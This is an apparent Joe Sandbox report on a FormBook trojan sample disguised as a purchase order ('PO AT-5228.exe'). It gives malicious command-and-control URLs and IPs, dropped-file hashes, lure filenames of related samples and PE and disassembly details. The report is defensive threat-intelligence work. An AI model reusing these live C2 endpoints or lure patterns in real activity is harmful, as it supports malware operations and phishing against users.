                www.energyparks.net | unknown | unknown | false | high
                www.neg21.top | unknown | unknown | false | unknown
                www.binacamasala.com | unknown | unknown | false | unknown
                www.iuyi542.xyz | unknown | unknown | true | unknown
                www.jllllbx.top | unknown | unknown | false | high
                www.ladylawher.shop | unknown | unknown | false | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.primeproperty.property/c1ti/ | true | Avira URL Cloud: safe | unknown
                http://www.energyparks.net/k47i/ | true | Avira URL Cloud: safe | unknown
                http://www.neg21.top/1i1f/ | true | Avira URL Cloud: safe | unknown
                http://www.ladylawher.shop/i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.ladylawher.shop/i4bc/ | true | Avira URL Cloud: safe | unknown
                http://www.flikka.site/brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.yvrkp.top/9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.iuyi542.xyz/cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= | true | Avira URL Cloud: safe | unknown
                http://www.kghjkx.xyz/usop/ | true | Avira URL Cloud: safe | unknown
                http://www.energyparks.net/k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.binacamasala.com/usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.primeproperty.property/c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.binacamasala.com/usv6/ | true | Avira URL Cloud: safe | unknown
                http://www.iuyi542.xyz/cymd/ | true | Avira URL Cloud: safe | unknown
                http://www.college-help.info/fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql | true | Avira URL Cloud: safe | unknown
                http://www.digitaladpro.shop/m6se/ | false | Avira URL Cloud: safe | unknown
                http://www.yvrkp.top/9jdk/ | true | Avira URL Cloud: safe | unknown
                http://www.flikka.site/brrb/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.16.211 | ghs.google.com | United States | 15169 | GOOGLEUS | false
67.223.117.142 | www.flikka.site | United States | 15189 | VIMRO-AS15189US | true
38.47.237.27 | iuyi542.xyz | United States | 174 | COGENT-174US | true
38.88.82.56 | www.college-help.info | United States | 174 | COGENT-174US | false
104.21.14.183 | www.yvrkp.top | United States | 13335 | CLOUDFLARENETUS | true
206.119.81.36 | neg21.top | United States | 174 | COGENT-174US | true
194.58.112.174 | www.marketplacer.top | Russian Federation | 197695 | AS-REGRU | true
3.33.130.190 | binacamasala.com | United States | 8987 | AMAZONEXPANSIONGB | false
47.129.103.185 | www.kghjkx.xyz | Canada | 34533 | ESAMARA-ASRU | true
113.20.119.31 | dns.webcake.io | Viet Nam | 45903 | CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN | false

Note: the Malicious column is the sandbox's own per-indicator verdict. 38.88.82.56 (www.college-help.info) and 113.20.119.31 (dns.webcake.io) are marked false here although the context tables below list them as contacted by several other samples classified as FormBook, so a false verdict in this column is not evidence that the indicator is clean.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554972
Start date and time: 2024-11-13 09:25:22 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO AT-5228.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@14/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 62
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Processes excluded from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Domains excluded from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BLUymyzgBTyhbo.exe, PID 5856 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded the maximum capacity and may have missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
67.223.117.142 | shipping doc_20241111.exe | malicious | FormBook | www.flikka.site/brrb/
67.223.117.142 | New PO [FK4-7173].pdf.exe | malicious | FormBook | www.maviro.xyz/hcih/
67.223.117.142 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.flikka.site/brrb/
67.223.117.142 | proforma Invoice.exe | malicious | FormBook | www.jorbaq.top/saaz/
67.223.117.142 | DHL_doc.exe | malicious | FormBook | www.plyvik.info/ak8m/
67.223.117.142 | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | www.plyvik.info/yhso/
67.223.117.142 | INVOICES.exe | malicious | FormBook | www.plyvik.info/ak8m/
38.47.237.27 | shipping doc_20241111.exe | malicious | FormBook | www.iuyi542.xyz/cymd/
38.47.237.27 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.iuyi542.xyz/cymd/
38.88.82.56 | shipping doc_20241111.exe | malicious | FormBook | www.college-help.info/fu91/
38.88.82.56 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.college-help.info/fu91/
38.88.82.56 | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | www.college-help.info/wm94/
38.88.82.56 | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | www.college-help.info/lk0h/
38.88.82.56 | 18in SPA-198-2024.exe | malicious | FormBook | www.college-help.info/lk0h/
38.88.82.56 | WARUNKI UMOWY-pdf.bat.exe | malicious | FormBook, GuLoader | www.college-help.info/ah9r/
38.88.82.56 | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | www.college-help.info/lk0h/
104.21.14.183 | shipping doc_20241111.exe | malicious | FormBook | www.yvrkp.top/9jdk/
104.21.14.183 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.yvrkp.top/9jdk/
206.119.81.36 | shipping doc_20241111.exe | malicious | FormBook | www.neg21.top/1i1f/
206.119.81.36 | SHIPPING DOC_20241107.exe | malicious | FormBook | www.neg21.top/1i1f/
206.119.81.36 | proforma Invoice.exe | malicious | FormBook | www.neg21.top/w6i7/
206.119.81.36 | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | www.neg21.top/e18l/
206.119.81.36 | NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exe | malicious | Unknown | www.neg21.top/e18l/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.college-help.info | shipping doc_20241111.exe | malicious | FormBook | 38.88.82.56
www.college-help.info | SHIPPING DOC_20241107.exe | malicious | FormBook | 38.88.82.56
www.college-help.info | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | 38.88.82.56
www.college-help.info | NF_Payment_Ref_FAN930276.exe | malicious | FormBook | 38.88.82.56
www.college-help.info | 18in SPA-198-2024.exe | malicious | FormBook | 38.88.82.56
www.college-help.info | WARUNKI UMOWY-pdf.bat.exe | malicious | FormBook, GuLoader | 38.88.82.56
www.college-help.info | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | 38.88.82.56
www.kghjkx.xyz | shipping doc_20241111.exe | malicious | FormBook | 47.129.103.185
www.kghjkx.xyz | SHIPPING DOC_20241107.exe | malicious | FormBook | 47.129.103.185
dns.webcake.io | shipping doc_20241111.exe | malicious | FormBook | 113.20.119.31
dns.webcake.io | SHIPPING DOC_20241107.exe | malicious | FormBook | 113.20.119.31
dns.webcake.io | https://pagina.pro/Iraq2024ew | malicious | Unknown | 203.205.10.134
dns.webcake.io | http://www.open-sora.org | malicious | Exela Stealer, Growtopia, Python Stealer | 203.205.10.134
dns.webcake.io | Versanddetails.exe | malicious | FormBook | 113.20.119.61
dns.webcake.io | Versanddetails.exe | malicious | FormBook | 113.20.119.61
dns.webcake.io | pagamento.exe | malicious | FormBook | 113.20.119.61
dns.webcake.io | Original Shipment Document.exe | malicious | FormBook | 113.20.119.61
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Loader.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=26510028&v0=aftua%40gmail.com&ru=//www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%SERIAL%25wDnNeW8yycT&sa=t&esrc=nNeW8F%SERIAL%25A0xys8Em2FL&source=&cd=tS6T8%SERIAL%25Tiw9XH&cad=XpPkDfJX%SERIAL%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%79%64%61%2E%6E%67%2F%63%69%67%2E%62%69%6E%2F%67%67%6C%6E%46%78%50%51%30%47%76%38%64%43%45%35%45%43%61%37%66%37%78%63%58%71%32%79%74%4D%57%65%54%6E%31%37%53%74%68%66%4C%56%74%52%44%70%4E%58%36%63%6B%42%66%50%7A%42%38%6B%51%52%36%38%64%67%53%64%31%4C%6C%73%33%71%37%76%6E%79%6E%48%6D%75%41%73%31%2F%23Y2hyaXN0b3BoZXIuZG9sYW5AdmlyZ2lubW9uZXkuY29t | malicious | HTMLPhisher, Mamba2FA | 104.17.25.14
CLOUDFLARENETUS | setup7.0.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
CLOUDFLARENETUS | blhbZrtqbLg6O1K.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | Updatev4_5.exe | malicious | LummaC | 104.21.80.55
CLOUDFLARENETUS | Payment Copy.docx.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | TT copy.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | 2 Payment Copy.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 172.67.74.152
VIMRO-AS15189US | shipping doc_20241111.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | fHkdf4WB7zhMcqP.exe | malicious | FormBook | 67.223.118.17
VIMRO-AS15189US | New PO [FK4-7173].pdf.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | SHIPPING DOC_20241107.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | proforma Invoice.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | DHL_doc.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | icRicpJWczmiOf8.exe | malicious | FormBook | 67.223.118.17
VIMRO-AS15189US | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | INVOICES.exe | malicious | FormBook | 67.223.117.142
VIMRO-AS15189US | QUOTE2342534.exe | malicious | FormBook | 67.223.117.169
COGENT-174US | yakuza.i586.elf | malicious | Unknown | 154.18.45.166
COGENT-174US | yakuza.mipsel.elf | malicious | Unknown | 38.251.108.229
COGENT-174US | meerkat.mpsl.elf | malicious | Mirai | 206.235.235.131
COGENT-174US | meerkat.spc.elf | malicious | Mirai | 204.45.214.204
COGENT-174US | meerkat.arm7.elf | malicious | Mirai | 38.6.229.100
COGENT-174US | Confirming - Notice of payment_SWIFT BJ23004300IU.bat.exe | malicious | FormBook | 154.23.243.75
COGENT-174US | FOTO#U011eRAFLAR.exe | malicious | FormBook | 38.47.232.202
COGENT-174US | wavjjT3sEq.exe | malicious | FormBook | 206.119.82.134
COGENT-174US | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | 154.38.64.6
COGENT-174US | inter.exe | malicious | Unknown | 154.23.181.145
                                                                                      No context
                                                                                      No context
Process: C:\Windows\SysWOW64\AtBroker.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......8...........$......................................................O}...........4.... [remaining preview bytes are non-printable and are rendered as dots]
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.994352075567934
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:q5buJtERmLfypQeAtoEmCTqLuXqPfKHZMtoPTW0Dpp9FES+gKVTFzPvR:q1usmLfah6IaXqPC5ooL5xFES+1JzXR
                                                                                      MD5:F5CDF90E36117F3EB7CC8804601A14A9
                                                                                      SHA1:930E6331C675AD4302B3E3FA06C470CD26AE538B
                                                                                      SHA-256:87675C6C3DAED3AC5196B0BFDE77C67D323EC023767F6EAB90AE01B4A9F5807B
                                                                                      SHA-512:E38945C874FAF90E193F01838FDA5DA56D4ADE8C7ADD97A78DA002880EE27DC1CA48B81F7624145E00E14A4DA8DD5391F31BDA14C9FDEEFF90FA1DB441885D1D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:t....GIHO...^....d.YD..q4\...9OXMYGIHOY7TWA59OXMYGIHOY7TWA5.OXMWX.FO.>.v.4u.y.1.:h?+X3% X.,9#7(=h-<.&"/.P!x...i% =RzZL?.OXMYGIH6X>.j!R.r8*.z)/.C...{U^.B..u((.-....Y(..0$!u/>.TWA59OXM..IH.X6T..scOXMYGIHO.7VVJ42OX.]GIHOY7TWA.-OXMIGIH?]7TW.59_XMYEIHIY7TWA59IXMYGIHOYGPWA79OXMYGKH..7TGA5)OXMYWIH_Y7TWA5)OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7Ty5PA;XMY..LOY'TWAc=OX]YGIHOY7TWA59OXmYG)HOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):14542
                                                                                      Entropy (8bit):7.63326193728937
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:nTYznwwovyyyY0lYRgtA+lQs3wN6Ue4ncEoVJSRgIn:nAwwo0RptZl33wN6nCGMaq
                                                                                      MD5:525B414835ED1A137CA0E4205780E495
                                                                                      SHA1:CBC054B76E9851AB9398363CEEEC830DCEB4C147
                                                                                      SHA-256:3791561C7BF97A86F9115E50127789A5FCF973D45609638984A002542B01F3AC
                                                                                      SHA-512:7F21A085998E6F02F3F7FD397989C0A24C13C6A302D49F6D1D5DE392573DF8A8823999E90BAD581B022DC05870B0D8E0C3161E21F61F99F5E3201168430B6225
                                                                                      Malicious:false
                                                                                      Preview:EA06..0..[-w9..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.994352075567934
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:q5buJtERmLfypQeAtoEmCTqLuXqPfKHZMtoPTW0Dpp9FES+gKVTFzPvR:q1usmLfah6IaXqPC5ooL5xFES+1JzXR
                                                                                      MD5:F5CDF90E36117F3EB7CC8804601A14A9
                                                                                      SHA1:930E6331C675AD4302B3E3FA06C470CD26AE538B
                                                                                      SHA-256:87675C6C3DAED3AC5196B0BFDE77C67D323EC023767F6EAB90AE01B4A9F5807B
                                                                                      SHA-512:E38945C874FAF90E193F01838FDA5DA56D4ADE8C7ADD97A78DA002880EE27DC1CA48B81F7624145E00E14A4DA8DD5391F31BDA14C9FDEEFF90FA1DB441885D1D
                                                                                      Malicious:false
                                                                                      Preview:t....GIHO...^....d.YD..q4\...9OXMYGIHOY7TWA59OXMYGIHOY7TWA5.OXMWX.FO.>.v.4u.y.1.:h?+X3% X.,9#7(=h-<.&"/.P!x...i% =RzZL?.OXMYGIH6X>.j!R.r8*.z)/.C...{U^.B..u((.-....Y(..0$!u/>.TWA59OXM..IH.X6T..scOXMYGIHO.7VVJ42OX.]GIHOY7TWA.-OXMIGIH?]7TW.59_XMYEIHIY7TWA59IXMYGIHOYGPWA79OXMYGKH..7TGA5)OXMYWIH_Y7TWA5)OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7Ty5PA;XMY..LOY'TWAc=OX]YGIHOY7TWA59OXmYG)HOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY7TWA59OXMYGIHOY
                                                                                      Process:C:\Users\user\Desktop\PO AT-5228.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):143378
                                                                                      Entropy (8bit):2.991317071383019
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lC6Hbc8ZhkCXWqb63Mic69+Vot6Qbk3oNV1U:1VMjtU
                                                                                      MD5:8C721A91156338C1B049063882794EF3
                                                                                      SHA1:FFC83EA9BC21A468DC7922751D36AD7254CE87E6
                                                                                      SHA-256:4A14D3039671A9049BACAF2A81F2D408D732E06AF579AE9DAEA22E6195F8C9BC
                                                                                      SHA-512:7C6B6FCD33021810D4459DF6713DA5482BC526C3F9F4B239382B1EF4083A9BBFFF93535026C591F31289E652E17B1FB9F618DC83F2C46B3A32F96DD3EB0E0D09
                                                                                      Malicious:false
                                                                                       Preview:
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.106414733161928
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:PO AT-5228.exe
                                                                                      File size:1'175'040 bytes
                                                                                      MD5:3df965173d78acbf95001caccbeaa150
                                                                                      SHA1:0ebe604c158eca5244c2fb19d56b03f6f7ae338a
                                                                                      SHA256:865ba0cdbc273e3d3035ec2acaf6510977798e008e79546e96e33e289b22c3b2
                                                                                      SHA512:b607e9a714b12b6c449a236b76309dfd9f1079b630d755b7787b4ab252ccdb1ce2ef36fea4188f5f2c8fb466cc4fc1604a691ab4c2d4297f4703dfa3ef40d7c9
                                                                                      SSDEEP:24576:wtb20pkaCqT5TBWgNQ7apWZJH94uCiP6/WVX7fe6A:5Vg5tQ7apWvOuLyaX7G5
                                                                                      TLSH:E645CF2373DD8365C3B25273BA667701AEBF782506A1F96B2FD4093DE820122525E773
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x673436AE [Wed Nov 13 05:18:38 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                      Instruction
                                                                                      call 00007F74C858102Fh
                                                                                      jmp 00007F74C8574044h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F74C85741CAh
                                                                                      cmp edi, eax
                                                                                      jc 00007F74C857452Eh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F74C85741C9h
                                                                                      rep movsb
                                                                                      jmp 00007F74C85744DCh
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F74C8574394h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F74C85741D0h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F74C85746A0h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F74C857436Dh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F74C857437Eh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F74C857435Dh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F74C85741CFh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F74C85741D3h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F74C8574225h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F74C8574278h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030
                                                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x55ddc | .rsrc
                                                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11a000 | 0x6c4c | .reloc
                                                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                                                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
